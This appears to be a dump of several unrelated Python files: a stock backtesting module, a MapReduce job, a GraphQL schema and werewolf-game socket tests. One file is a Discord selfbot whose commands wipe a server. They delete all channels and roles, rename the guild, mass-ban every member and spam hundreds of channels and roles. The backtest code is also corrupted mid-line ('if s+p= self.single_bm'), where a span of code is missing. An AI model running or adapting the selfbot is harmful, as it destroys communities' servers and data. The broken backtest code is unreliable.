self.LinearCombination(weight_list,df_list)\r\n params_for_actfunc['df']=lc\r\n res = getattr(self,activate_func)(**params_for_actfunc)\r\n return res\r\n\r\n def StringEqual(self,df,analog_str_list): # df = str in str_list? 1,0\r\n res = np.full_like(df,0)\r\n for a_str in analog_str_list:\r\n res += np.where(df==a_str,1,0)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def StringElimination(self,df,analog_str_list): # df = str in str_list? 0,1\r\n res = np.full_like(df,1,dtype=int)\r\n for a_str in analog_str_list:\r\n res *= np.where(df==a_str,0,1)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def Extend1DTSto2D(self,df_1d,target_df):\r\n index1 = df_1d.index\r\n index2 = target_df.index\r\n missing_dates = index2.difference(index1)\r\n res = df_1d.T\r\n if len(missing_dates) > 0:\r\n res[missing_dates] = pd.DataFrame([[np.nan for i in range(len(missing_dates))]])\r\n res = res[index2].values.flatten()\r\n result = np.tile(res,(target_df.shape[1],1)).T\r\n result_df = self.TransNPtoOriDF(result,target_df)\r\n return result_df\r\n\r\n def Extend1DCSto2D(self,df_1d,target_df):\r\n col1 = df_1d.columns\r\n col2 = target_df.columns\r\n missing_firms = col2.difference(col1)\r\n res = df_1d\r\n if len(missing_firms) > 0:\r\n res[missing_firms] = pd.DataFrame([[np.nan for i in range(len(missing_firms))]])\r\n res = res[col2].values.flatten()\r\n result = np.tile(res,(target_df.shape[0],1))\r\n result_df = self.TransNPtoOriDF(result,target_df)\r\n return result_df\r\n\r\n def MissingColumns(self,ori_df,target_df):\r\n correct_columns = pd.Index(target_df.columns)\r\n input_columns = pd.Index(ori_df.columns)\r\n return list(correct_columns.difference(input_columns))\r\n\r\n def TrimColumns(self,ori_df,target_df):\r\n lack_tickers = self.MissingColumns(ori_df,target_df)\r\n for t in lack_tickers:\r\n ori_df.insert(0,t,np.nan)\r\n res = ori_df[target_df.columns]\r\n return res\r\n\r\n def TrimDF(self,ori_df,target_df): #columns must be the same,index must be timestamp or datetime\r\n ori_index,ori_col = ori_df.index,ori_df.columns\r\n target_index,target_col = target_df.index,target_df.columns\r\n if target_col.equals(ori_col) == False:\r\n print('Notice: Columns are different')\r\n ori_df = self.TrimColumns(ori_df,target_df)\r\n\r\n if target_index.equals(ori_index) == True:\r\n print('Job already Done')\r\n return ori_df\r\n\r\n ori_np,target_np = ori_df.values,target_df.values\r\n result_np = np.full_like(target_np,np.nan)\r\n current_seat = 0\r\n ori_first_day = ori_index[0]\r\n ori_last_day = ori_index[-1]\r\n\r\n for i in range(len(target_index)):\r\n tar_d = target_index[i]\r\n if tar_d < ori_first_day:\r\n pass\r\n #print(tar_d,'Data not Found')\r\n elif tar_d == ori_first_day:\r\n result_np[i,:] = ori_np[0,:]\r\n elif tar_d > ori_last_day:\r\n result_np[i,:] = ori_np[-1,:]\r\n else: #that is, tar_d > ori_first_day\r\n for k in range(current_seat,len(ori_index)):\r\n #print(tar_d,ori_index[k])\r\n if tar_d == ori_index[k]:\r\n #print(tar_d,ori_index[k])\r\n current_seat = k-1\r\n result_np[i,:] = ori_np[k,:]\r\n break \r\n elif tar_d < ori_index[k]:\r\n #print(tar_d,ori_index[k])\r\n current_seat = k-1\r\n result_np[i,:] = ori_np[k-1,:]\r\n break \r\n result_df = self.TransNPtoOriDF(result_np,target_df)\r\n return result_df\r\n\r\n def MaxOfManyArray(self,candidate):\r\n res = np.maximum(candidate[0],candidate[1])\r\n for i in range(2,len(candidate)):\r\n res = np.maximum(res,candidate[i])\r\n return res\r\n\r\n def MinOfManyArray(self,candidate):\r\n res = np.minimum(candidate[0],candidate[1])\r\n for i in range(2,len(candidate)):\r\n res = np.minimum(res,candidate[i])\r\n return res\r\n\r\n def RisedaysRatio(self,df,period): \r\n rise = self.TransNPtoOriDF(np.where(df>0,1,0),df) \r\n dip = self.TransNPtoOriDF(np.where(df<0,1,0),df) \r\n period_rise = self.ColumnSum(rise,period) \r\n period_dip = self.ColumnSum(dip,period) \r\n return period_rise/(period_rise+period_dip) \r\n \r\n \r\nclass BacktestData(Operators,DrawPlotByTS):\r\n database={}\r\n def __init__(self):\r\n print('Initializing BacktestData...')\r\n self.path = './data/'\r\n self.cpath = './cache/'\r\n print(self.path)\r\n self.ImportData('ret')\r\n self.CheckRet('ret')\r\n self.ImportData('bm_ret')\r\n self.CheckRet('bm_ret')\r\n self.firms = self.database['ret'].columns\r\n print('Successfully Initializing BacktestData')\r\n \r\n def CheckRet(self,ret_df_name):\r\n check_ret = np.nanmean(abs(self.database[ret_df_name]),axis=1)[1]\r\n print(ret_df_name,check_ret)\r\n if check_ret > 0.5:\r\n decision = input('Unit of '+ret_df_name+' is Wrong, Convert it?(Y/N)')\r\n if decision == 'Y' or decision == 'y':\r\n self.database[ret_df_name] *= 0.01\r\n self.ExportData(ret_df_name)\r\n self.tickers = list(self.database['ret'].columns)\r\n\r\n def Import(self,df_name,folder_url,encoder):\r\n file_name = df_name+'.csv'\r\n datas = os.listdir(folder_url)\r\n if file_name not in datas:\r\n print('-Error:',file_name,' Not Found.')\r\n yes_or_no = input(\"Build an Empty File to Continue?(Y/N)\")\r\n if yes_or_no == 'Y' or yes_or_no == 'y':\r\n pd.DataFrame([[0.01],[0.01],[0.01]]).to_csv(folder_url+file_name)\r\n print('Successfully Build an Empty File to Continue!')\r\n else:\r\n print('Import Process Interupted.')\r\n return 0\r\n self.database[df_name]=pd.read_csv(folder_url+file_name,index_col=0,parse_dates=True,encoding=encoder)\r\n \r\n def ImportData(self,_df_name):\r\n try:\r\n self.Import(df_name=_df_name,folder_url=self.path,encoder='cp950')\r\n except:\r\n self.Import(df_name=_df_name,folder_url=self.path,encoder='utf-8')\r\n \r\n def ImportCache(self,_df_name):\r\n try:\r\n self.Import(df_name=_df_name,folder_url=self.cpath,encoder='cp950')\r\n except:\r\n self.Import(df_name=_df_name,folder_url=self.cpath,encoder='utf-8')\r\n \r\n def AddData(self,df,df_name):\r\n self.database[df_name] = df\r\n\r\n def ExportData(self,_df_name,_encoder='cp950'):\r\n self.Export(df_name=_df_name,folder_url=self.path,encoder=_encoder)\r\n\r\n def ExportCache(self,_df_name,_encoder='cp950'):\r\n self.Export(df_name=_df_name,folder_url=self.cpath,encoder=_encoder)\r\n \r\n def Export(self,df_name,folder_url,encoder):\r\n existing_files = os.listdir(folder_url)\r\n file_name = df_name+'.csv'\r\n self.database[df_name].to_csv(folder_url+file_name,encoding=encoder)\r\n \r\n def ShowDFList(self):\r\n df_key = list(self.database.keys())\r\n df_key.sort()\r\n return df_key\r\n\r\nclass CalculatePosition(BacktestData,Operators):\r\n def __init__(self):\r\n self._reference_df = self.database['ret']\r\n self.firms = self.database['ret'].columns\r\n \r\n def Multiply(self,pos_list): #Logic-'AND'\r\n res = pos_list[0].copy()\r\n for i in range(1,len(pos_list)):\r\n res *= pos_list[i]\r\n return res\r\n \r\n def SumUp(self,pos_list): #Logic-'OR' ,Can also be Used to combine Long/Short Position\r\n res = pos_list[0].copy()\r\n for i in range(1,len(pos_list)):\r\n res += pos_list[i]\r\n return res\r\n \r\n def Weight(self,pos,weight): #weight can be constant,df,np\r\n res = pos*weight\r\n return res\r\n \r\n def PickByDF(self,pos,pick_df,pick_howmany,descending=True):\r\n ndarr = self.TransDFtoNP(pos)\r\n res = np.full_like(ndarr,0)\r\n for i in range(len(ndarr)):\r\n exist_pos = list(np.where(ndarr[i]>0)[0])\r\n if len(exist_pos)>pick_howmany:\r\n sel = pick_df.iloc[i,exist_pos]\r\n sel_rank = sel[np.argsort(sel)]\r\n if descending == True:\r\n for j in range(1,pick_howmany+1):\r\n res[i,list(self.firms).index(sel_rank.index[-j])] = ndarr[i,list(self.firms).index(sel_rank.index[-j])]\r\n else:\r\n for j in range(pick_howmany):\r\n res[i,list(self.firms).index(sel_rank.index[j])] = ndarr[i,list(self.firms).index(sel_rank.index[j])]\r\n else:\r\n for j in exist_pos:\r\n res[i,j] = ndarr[i,j]\r\n return res\r\n\r\n def PickByRandom(self,pos,pick_howmany):\r\n ndarr = self.TransDFtoNP(pos)\r\n res = np.full_like(ndarr,0)\r\n for i in range(len(pos)):\r\n exist_pos = list(np.where(ndarr[i]>0)[0])\r\n if len(exist_pos)>pick_howmany:\r\n sel = rdn.sample(exist_pos,pick_howmany)\r\n for j in sel:\r\n res[i,j] = ndarr[i,j]\r\n else:\r\n for j in exist_pos:\r\n res[i,j] = ndarr[i,j]\r\n res = self.TransNPtoOriDF(res,pos)\r\n return res\r\n\r\n def Neutral(self,pos):\r\n pos_adj = np.nanmean(pos,axis=1)\r\n pos_adj = pd.DataFrame(pos_adj,index=pos.index)\r\n pos_adj = self.Extend1DTSto2D(pos_adj,pos)\r\n res = pos - pos_adj\r\n return res\r\n\r\n def SegNeutral(self,pos,segment_df):\r\n segment_np,pos_np = segment_df.values,pos.values\r\n seglist = set(list(segment_np[0,:]))\r\n res = np.full_like(pos,0,dtype=np.float)\r\n for seg in seglist:\r\n seg_pos = np.where(segment_np==seg,pos_np,np.nan)\r\n seg_pos = self.TransNPtoOriDF(seg_pos,pos)\r\n seg_pos_demean = self.Neutral(seg_pos)\r\n seg_pos_demean_masked = np.where(segment_np==seg,seg_pos_demean,0)\r\n res += seg_pos_demean_masked \r\n res = self.TransNPtoOriDF(res,pos)\r\n return res\r\n\r\n def Scale(self,pos):\r\n pos_adj = np.sum(abs(pos),axis = 1)\r\n for i in range(len(pos_adj)):\r\n if pos_adj[i] == 0:\r\n pos_adj[i] = 1\r\n pos_adj = np.tile(pos_adj,(len(self.firms),1)).T\r\n res = pos/pos_adj\r\n return res\r\n \r\n def Timing(self,pos,time_filter):\r\n res = pos * time_filter\r\n return res\r\n \r\n def AdjustFreq(self,pos,start,new_freq):\r\n res = self.TransDFtoNP(pos)\r\n for i in range(start,len(res),new_freq):\r\n for ii in range(1,new_freq):\r\n if i+ii < len(res):\r\n res[i+ii,] = res[i,]\r\n return res\r\n\r\n def MaxHoldingCap(self,pos,cap):\r\n res = self.TransDFtoNP(pos)\r\n res = np.where(res>cap,cap,res)\r\n res = self.TransNPtoOriDF(res,pos)\r\n return res\r\n\r\n def MinHoldingPeriod(self,pos,period): #Use this func before scaling and weighting!\r\n #print('Hint: Input boolin array into MinHoldingPeriod!')\r\n res = self.TransDFtoNP(pos)\r\n for j in range(1,len(res[0])):\r\n signals = [] #找出第一次出現訊號的位置\r\n for i in range(len(res)):\r\n if res[i,j] != 0 and res[i-1,j] == 0:\r\n signals.append(i)\r\n for s in signals:\r\n for p in range(1,period):\r\n if s+p= self.single_bm.iloc[i,0]:\r\n wins += 1\r\n if self.single_str.iloc[i,0] > 1:\r\n abs_wins += 1\r\n winrate = wins/len(self.single_bm)\r\n print('Winrate:','%s'% (np.round(100*winrate,2))+'%')\r\n abs_winrate = abs_wins/len(self.single_bm)\r\n print('ABS_Winrate:','%s'% (np.round(100*abs_winrate,2))+'%')\r\n\r\n def Turnover(self):\r\n res = print('Turnover Rate:','%s'% (np.round(100*np.mean(self.dif_position_rowsum),2))+'%')\r\n \r\n def CalculateReturn(self):\r\n #print(self.alternative)\r\n self.alternative_ret = self.HowToUseIdleCash(self.alternative)\r\n self.daily_return = pd.DataFrame.sum(self.able_position * self.able_return,axis = 1,skipna=True) + (1-pd.DataFrame.sum(self.able_position,axis=1))*self.alternative_ret\r\n self.daily_return = pd.DataFrame(self.daily_return,columns=['sum'])\r\n self.dif_position = self.BwdChangeNumber(self.able_position)\r\n self.dif_position = self.FillRowN(self.dif_position,fill_in_content=self.able_position,row_number=0)\r\n self.dif_position_rowsum = abs(self.dif_position).sum(axis=1,skipna=True)\r\n self.change_loss = pd.DataFrame(self.fee_rate * self.dif_position_rowsum,columns=['sum'])\r\n #self.change_loss = pd.DataFrame((self.fee_rate * abs(self.dif_position)).sum(axis=1,skipna=True),columns=['sum'])\r\n #print(change_loss.shape,daily_return.shape)\r\n \r\n def Compounding(self):\r\n self.single_str = 1 + self.daily_return - self.change_loss\r\n self.single_bm = 1 + self.able_bm_return\r\n self.path_str = self.Compound(self.single_str,False)\r\n self.path_str.index = self.able_dates[1:]\r\n self.path_bm = self.Compound(self.single_bm,False)\r\n self.path_bm.index = self.able_dates[1:]\r\n #print(len(self.path_str),len(self.path_bm))\r\n \r\n def ExportPlot(self):\r\n self.PlotLogPicture([\"allocation\",\"benchmark\"],self.piy,self.single_str['sum'],self.single_bm['bm']) #label,1年有幾期,單一日報酬df\r\n self.PlotDrawdown([\"allocation\",\"benchmark\"],self.path_str['sum'],self.path_bm['bm']) #label,累積日報酬df\r\n \r\n def GetBasicInf(self):\r\n self.Winrate()\r\n self.Turnover()\r\n self.cbi = self.CalculateBasicInformation(self.path_str['sum'],self.single_str['sum'],self.piy)\r\n self.gbi_dict = {'Ret':self.cbi[0],'Std':self.cbi[1],'Sharpe':self.cbi[2],'DD':self.cbi[3],'RtoDD':self.cbi[4]}\r\n return self.gbi_dict\r\n\r\n def GetBasicInf_fast(self):\r\n self.cbi = self.CalculateBasicInformationFast(self.path_str['sum'],self.single_str['sum'],self.piy)\r\n self.gbi_dict = {'Ret':self.cbi[0],'Std':self.cbi[1],'Sharpe':self.cbi[2],'DD':self.cbi[3],'RtoDD':self.cbi[4]}\r\n return self.gbi_dict\r\n \r\n def Go(self,fastmode):\r\n if fastmode == False:\r\n self.CalculateReturn()\r\n self.Compounding()\r\n self.finish = self.GetBasicInf()\r\n print(self.finish)\r\n elif fastmode == True:\r\n self.CalculateReturn()\r\n self.Compounding()\r\n self.finish = self.GetBasicInf_fast()\r\n #print(np.round(self.finish['Sharpe'],4))\r\n \r\n def CorrwithBM(self): \r\n value = np.round(np.corrcoef(self.single_bm.values.flatten(),self.single_str.values.flatten())[0,1],4) \r\n return value\r\n\r\n def RetDistribution(self,bins=25):\r\n strategy_ret = self.single_str.values\r\n plt.hist(strategy_ret,bins)\r\n plt.show()\r\n\r\n def NumberOfHolding(self):\r\n pos = self.able_position\r\n long_or_short = np.where((pos>0)|(pos<0),1,0)\r\n res = np.sum(long_or_short,axis=1)\r\n res = pd.DataFrame(res,index=pos.index)\r\n return res\r\n\r\n def OutplayGraph(self):\r\n strategy_ret,bm_ret = self.path_str.values,self.path_bm.values\r\n div = pd.DataFrame((strategy_ret/bm_ret),index=self.path_str.index)\r\n plt.figure(figsize=(15,3))\r\n plt.plot(div)\r\n plt.yscale(\"log\")\r\n plt.show()\r\n\r\n def LargestPosition(self):\r\n pos,firm_ret = self.able_position,self.able_return\r\n most = np.max(pos,axis=1)\r\n firms,dates = pos.columns,pos.index\r\n position_np = pos.values\r\n firm_ret_np = strategy_ret.values\r\n for i in range(len(most)):\r\n for j in range(len(firms)):\r\n if position_np[i,j] == most[i]:\r\n print(dates[i],firms[j],most[i],'/ Its return:',firm_ret_np[i,j])\r\n break\r\n\r\n def Receipt(self,start_date=0,end_date=0):\r\n pos = self.able_position\r\n pos_np,ret_np = self.TransDFtoNP(pos),self.able_return.values\r\n pos_index,pos_columns = pos.index,pos.columns\r\n if end_date == 0:\r\n end_date = len(pos_np)\r\n for i in range(start_date,end_date):\r\n print(pos_index[i])\r\n for j in range(len(pos_np[i])):\r\n if pos_np[i,j] > 0:\r\n print(pos_columns[j],np.round(ret_np[i,j],4))\r\n\r\n def WeekdayPerformance(self):\r\n res = [[],[],[],[],[]]\r\n for i in range(len(self.single_str)):\r\n wd = dt.datetime.weekday(self.single_str.index[i])\r\n ret = self.single_str.values[i][0]\r\n try:\r\n res[wd].append(ret)\r\n except:\r\n continue\r\n res = np.asarray(res)\r\n data = {'Mon':np.mean(res[0])-1,'Tue':np.mean(res[1])-1,'Wed':np.mean(res[2])-1,'Thu':np.mean(res[3])-1,'Fri':np.mean(res[4])-1}\r\n return data\r\n\r\n def ShowInfoOfSpecifiedStocks(self,condition,*database): #condition should be a boolin matrix that represents what you care\r\n pos = self.pos_str_df\r\n trimmed_data = []\r\n for db in database:\r\n temp = self.TrimDF(ori_df=db,target_df=pos)\r\n trimmed_data.append(temp.values)\r\n position_np = pos.values()\r\n firms,dates = pos.columns,pos.index\r\n for i in range(len(dates)):\r\n for j in range(len(firms)):\r\n if condition[i,j] == 1:\r\n print(dates[i],firms[j])\r\n for td in trimmed_data:\r\n print(td,td[i,j])\r\n\r\n def RollingTest(self,interval_length):\r\n strategy_ret = self.single_str['sum']\r\n bm_ret = self.single_bm['bm']\r\n period_in_year = self.piy\r\n\r\n for i in range(0,len(strategy_ret),interval_length):\r\n print('Period',i)\r\n switch = 0\r\n for ret in [strategy_ret,bm_ret]:\r\n if switch == 0:\r\n switch += 1\r\n print('Str:')\r\n else:\r\n print('Benchmark:')\r\n interval_ret = ret.iloc[i:i+interval_length]\r\n interval_path = self.Compound(interval_ret,False)\r\n cbi = self.CalculateBasicInformation(interval_path,interval_ret,period_in_year)\r\n print(cbi)\r\n\r\n def StatOfEachBet(self):\r\n pos,ret = self.able_position.values,self.able_return.values\r\n record = []\r\n for i in range(len(pos)):\r\n for j in range(len(pos[i])):\r\n if pos[i,j] > 0:\r\n record.append(ret[i,j])\r\n tstat = (m.sqrt(len(record))*np.nanmean(record)/(np.nanstd(record)))\r\n res = (np.nanmean(record),np.nanstd(record),len(record),tstat)\r\n #print(res)\r\n return res","sub_path":"BackTestModulePortable.py","file_name":"BackTestModulePortable.py","file_ext":"py","file_size_in_byte":42116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"177198906","text":"import MapReduce\nimport json\nimport sys\n\n\nmr = MapReduce.MapReduce()\n\n\ndef mapper(record):\n jenc = json.JSONEncoder()\n mr.emit_intermediate(jenc.encode((record[0], record[1])), 'bFriendOfA')\n mr.emit_intermediate(jenc.encode((record[1], record[0])), 'aFriendOfB')\n\ndef reducer(persons_pair, friendship_direction):\n if len(friendship_direction) == 1:\n pair = json.loads(persons_pair)\n mr.emit((pair[0], pair[1]))\n \n\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"Assignment 3/asymmetric_friendships.py","file_name":"asymmetric_friendships.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"289068211","text":"import discord, os, json, time\r\n\r\nfrom discord.ext import commands\r\n\r\nwith open('config.json') as f:\r\n config = json.load(f)\r\n\r\ntoken = config.get('token')\r\nprefix = config.get('prefix')\r\n\r\nbot = commands.Bot(description='Selfbot', command_prefix=prefix, self_bot=True)\r\nbot.remove_command('help')\r\n\r\n@bot.event\r\nasync def on_connect():\r\n print(f''' \r\n Connected and Ready for use!\r\n User: {bot.user.name},\r\n Prefix: {prefix}\r\n ''')\r\n\r\n@bot.event\r\nasync def on_message_edit(before, after):\r\n await bot.process_commands(after)\r\n\r\n@bot.command()\r\nasync def purge(ctx, amount: int):\r\n await ctx.message.delete()\r\n async for message in ctx.message.channel.history(limit=amount).filter(lambda m: m.author == bot.user).map(lambda m: m):\r\n try:\r\n await message.delete()\r\n except:\r\n pass\r\n\r\n@bot.command()\r\nasync def cls(ctx):\r\n os.system(\"cls\")\r\n await ctx.message.edit(content='done.')\r\n print(f''' \r\n Connected and Ready for use!\r\n User: {bot.user.name},\r\n Prefix: {prefix}\r\n ''')\r\n\r\n@bot.command()\r\nasync def destroy(ctx):\r\n await ctx.message.delete()\r\n x = input('New server name: ')\r\n x2 = input('New text channels name: ')\r\n x3 = input('New roles name: ')\r\n print(f'Changed Discord Server Name to: {x}, Creating channels with the name: {x2}, Creating roles with the name: {x3}')\r\n print('Destroyed:', ctx.guild.name)\r\n for channel in list(ctx.guild.channels):\r\n try:\r\n time.sleep(1)\r\n await channel.delete()\r\n except:\r\n pass\r\n for role in list(ctx.guild.roles):\r\n try:\r\n time.sleep(1)\r\n await role.delete()\r\n except:\r\n pass\r\n try:\r\n await ctx.guild.edit(\r\n name= x,\r\n description=\"Destroyed\",\r\n reason=\"why not.\",\r\n icon=None,\r\n banner=None\r\n )\r\n except:\r\n pass\r\n for _i in range(250):\r\n time.sleep(1)\r\n await ctx.guild.create_text_channel(name=x2)\r\n for _i in range(250):\r\n time.sleep(1)\r\n await ctx.guild.create_role(name=x3)\r\n\r\n@bot.command()\r\nasync def massban(ctx):\r\n await ctx.message.delete()\r\n print('Mass banning in:', ctx.guild.name)\r\n users = list(ctx.guild.members)\r\n for user in users:\r\n try:\r\n time.sleep(1)\r\n await user.ban(reason=\"destroy.\")\r\n except:\r\n pass\r\n\r\n@bot.command()\r\nasync def delete(ctx):\r\n await ctx.message.delete()\r\n reply = str(input(f'would you like to delete {ctx.guild.name} (y/n): ')).lower().strip()\r\n if reply[0] == 'y':\r\n await ctx.guild.delete()\r\n print(f'Deleted {ctx.guild.name}')\r\n return True\r\n if reply[0] == 'n':\r\n print(f'Didn\\'t delete {ctx.guild.name}')\r\n return False\r\n else:\r\n return yes_or_no(\"Uhhhh... please enter \")\r\n\r\n@bot.command()\r\nasync def spamchannels(ctx):\r\n await ctx.message.delete()\r\n x = input('Name of channels to spam?: ')\r\n print('Spamming channel creation in:', ctx.guild.name,'with the name:', x)\r\n for _i in range(250):\r\n try:\r\n time.sleep(1)\r\n await ctx.guild.create_text_channel(name= x)\r\n except:\r\n return\r\n\r\n@bot.command()\r\nasync def spamroles(ctx):\r\n await ctx.message.delete()\r\n x = input('Name of roles to spam?: ')\r\n print('Spamming role creation in:', ctx.guild.name,'with the name:', x)\r\n for _i in range(250):\r\n try:\r\n time.sleep(1)\r\n await ctx.guild.create_role(name= x)\r\n except:\r\n return\r\n\r\n@bot.command()\r\nasync def delchannels(ctx):\r\n await ctx.message.delete()\r\n print('Deleteing channels in:', ctx.guild.name)\r\n for channel in list(ctx.guild.channels):\r\n try:\r\n time.sleep(1)\r\n await channel.delete()\r\n except:\r\n return\r\n\r\n@bot.command()\r\nasync def delroles(ctx):\r\n await ctx.message.delete()\r\n print('Deleteing roles in:', ctx.guild.name)\r\n for role in list(ctx.guild.roles):\r\n try:\r\n time.sleep(1)\r\n await role.delete()\r\n except:\r\n pass\r\n\r\nbot.run(token, bot=False)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393710807","text":"def squared_sum_difference(number):\n ''' returns the difference between the square of the sum of the positive\n integers up to and the sum of the squares of the positive\n integers up to , it assumes that it is being passed an integer\n within reasonable bounds.\n Timings: n=100 ~30microseconds, n=1000 ~220microseconds\n n=20000 ~5miliseconds (half of total response time)\n n=3000000 900miliseconds'''\n squared_sum = sum = 0\n for i in xrange(1, number+1):\n sum += i\n squared_sum += i*i\n return sum*sum - squared_sum\n\n","sub_path":"difference/calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"181928344","text":"import graphene\n\nfrom django.contrib.auth import get_user_model\n\nfrom graphene_django.types import DjangoObjectType\n\nfrom lcdbar.api import models\n\nclass PaymentType(DjangoObjectType):\n class Meta:\n model = models.Payment\n\nclass ProductType(DjangoObjectType):\n class Meta:\n model = models.Product\n\nclass UserType(DjangoObjectType):\n class Meta:\n model = get_user_model()\n\nclass CreatePayment(graphene.Mutation):\n class Arguments:\n barcode = graphene.Int()\n pin = graphene.Int()\n\n # output fields\n payment = graphene.Field(lambda: PaymentType)\n\n def mutate(self, info, barcode, pin):\n payment = models.Payment.objects.create(barcode=barcode, pin=pin)\n return CreatePayment(payment=payment)\n\nclass CreateProduct(graphene.Mutation):\n class Arguments:\n name = graphene.String()\n quantity = graphene.Int()\n\n ok = graphene.Boolean()\n product = graphene.Field(lambda: ProductType)\n\n def mutate(self, info, name, quantity, avatar):\n product = models.Product.objects.create(name=name, quantity=quantity)\n ok = True\n return CreateProduct(product=product, ok=ok)\n\nclass Mutations(graphene.ObjectType):\n create_product = CreateProduct.Field()\n create_payment = CreatePayment.Field()\n","sub_path":"lcdbar/api/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"116003322","text":"from . import WWTesting\nfrom apps.games.models import Game, Player, Role, Vote\nfrom apps.users.models import User\n\nimport json\n\nclass SocketTests(WWTesting):\n\n def test_login(self):\n username = \"TestUser1\"\n password = \"password\"\n self.socketio.emit('login', {\n \"username\": username,\n \"password\": password,\n })\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n assert username in latest_response['user']['username']\n\n def test_game_create(self):\n user_id = 1\n self.socketio.emit('create_game', {\n \"user_id\": user_id,\n \"public\": True,\n\n })\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n assert latest_response['game']['creator']['id'] == user_id\n assert len(latest_response['game']['players']) == 1\n assert latest_response['game']['players'][0]['user']['id'] == user_id\n\n def test_vote(self):\n voter_id = 1\n choice_id = 5\n self.socketio.connect()\n self.socketio.emit('set_vote',{\n \"voter_id\": voter_id,\n \"choice_id\": choice_id,\n });\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n assert latest_response['game']['players'][choice_id - 1]['id'] == choice_id\n assert latest_response['game']['players'][choice_id -1]['votes']['default'] == 1\n assert 'werewolf' not in latest_response['game']['players'][4]['votes']\n assert len(latest_response['game']['players'][3]['votes']) == 0\n\n def test_special_vote(self):\n voter_id = 1\n choice_id = 5\n role_id = 1\n role_name = \"Werewolf\"\n self.socketio.connect()\n self.socketio.emit('set_vote',{\n \"voter_id\": voter_id,\n \"choice_id\": choice_id,\n \"role_id\": role_id,\n });\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n assert latest_response['game']['players'][choice_id - 1]['id'] == choice_id\n assert latest_response['game']['players'][choice_id -1]['votes'][role_name] == 1\n assert 'werewolf' not in latest_response['game']['players'][4]['votes']\n assert len(latest_response['game']['players'][3]['votes']) == 0\n\n def vote_full_turn(self, villager_target, ww_target, seer_target):\n self.socketio.connect()\n game = self.db.session.query(Game).filter_by(code=\"TESTCODE\").join(Player).first()\n players = self.db.session.query(Player).filter_by(game=game).join(Role).all()\n player_set = []\n for player in players:\n player_set.append({\n \"voter_id\" : player.id,\n \"role_id\" : player.role.id,\n \"role_name\" : player.role.name\n })\n for counter, player in enumerate(player_set):\n self.socketio.emit('set_vote',{\n \"voter_id\": player[\"voter_id\"],\n \"choice_id\": villager_target,\n });\n if player[\"role_name\"] == \"Werewolf\":\n self.socketio.emit('set_vote',{\n \"voter_id\": player[\"voter_id\"],\n \"choice_id\": ww_target,\n \"role_id\": player[\"role_id\"],\n });\n if player[\"role_name\"] == \"Seer\":\n self.socketio.emit('set_vote',{\n \"voter_id\": player[\"voter_id\"],\n \"choice_id\": seer_target,\n \"role_id\": player[\"role_id\"],\n });\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]\n #print(\"test_vote_full_turn\\n\", json.dumps(latest_response, sort_keys=True, indent=4, separators=(',', ': ')))\n return latest_response\n\n def test_first_turn(self):\n villager_target = 1\n ww_target = 6\n seer_target = 5\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert response['votes']['default']['user']['id'] == villager_target\n assert response['votes']['Werewolf']['user']['id'] == ww_target\n assert response['votes']['Seer']['user']['id'] == seer_target\n assert response['game']['current_turn'] == 2\n\n def test_werewolves_win(self):\n villager_target = 9\n ww_target = 8\n seer_target = 1\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert response['votes']['default']['user']['id'] == villager_target\n assert response['votes']['Werewolf']['user']['id'] == ww_target\n assert response['votes']['Seer']['user']['id'] == seer_target\n assert response['game']['current_turn'] == 2\n villager_target = 7\n ww_target = 6\n seer_target = 2\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert response['votes']['default']['user']['id'] == villager_target\n assert response['votes']['Werewolf']['user']['id'] == ww_target\n assert response['votes']['Seer']['user']['id'] == seer_target\n assert response['game']['current_turn'] == 3\n villager_target = 5\n ww_target = 4\n seer_target = 2\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert response['game']['current_turn'] == 4\n assert \"evil\" in response['winner']\n\n def test_villagers_win(self):\n villager_target = 1\n ww_target = 2 #Werewolf suicide\n seer_target = 5\n response = self.vote_full_turn(villager_target, ww_target, seer_target)\n assert \"good\" in response['winner']\n assert response['game']['current_turn'] == 2\n\n\n def test_add_user(self):\n game_id = 1\n user_id = 12\n expected_user = User.query.get(user_id).username\n self.socketio.connect()\n self.socketio.emit('add_player',\n {\n \"game_id\": game_id,\n \"user_id\": user_id,\n })\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]['game']\n assert len(latest_response['players']) == 11\n assert expected_user in latest_response['players'][-1]['user']['username']\n\n def test_assign_roles(self):\n game_id = 1\n self.socketio.emit('assign_roles', {\"game_id\": game_id})\n response = self.socketio.get_received()\n latest_response = response[-1]['args'][0]['game']\n #Need more thorough checks\n assert len(latest_response['players']) == 10\n\n def test_player_quit(self):\n game_id = 1\n game = Game.query.get(game_id)\n player = game.players.first()\n player_id = player.id\n self.socketio.connect()\n self.socketio.emit('quit_player', {\"player_id\": player_id})\n response = self.socketio.get_received()\n quitter = response[-1]['args'][0]['quitter']\n assert quitter['alive'] is not True\n assert quitter['id'] == player_id\n\n def test_admin_set_role(self):\n admin_id = 1\n game_id = 1\n role_id = 3 #Seer\n game = Game.query.get(game_id)\n player = game.players.first()\n player_id = player.id\n self.socketio.connect()\n self.socketio.emit('admin_set_role', {\n \"admin_id\": admin_id,\n \"password\": \"password\",\n \"player_id\": player_id,\n \"role_id\": role_id,\n })\n response = 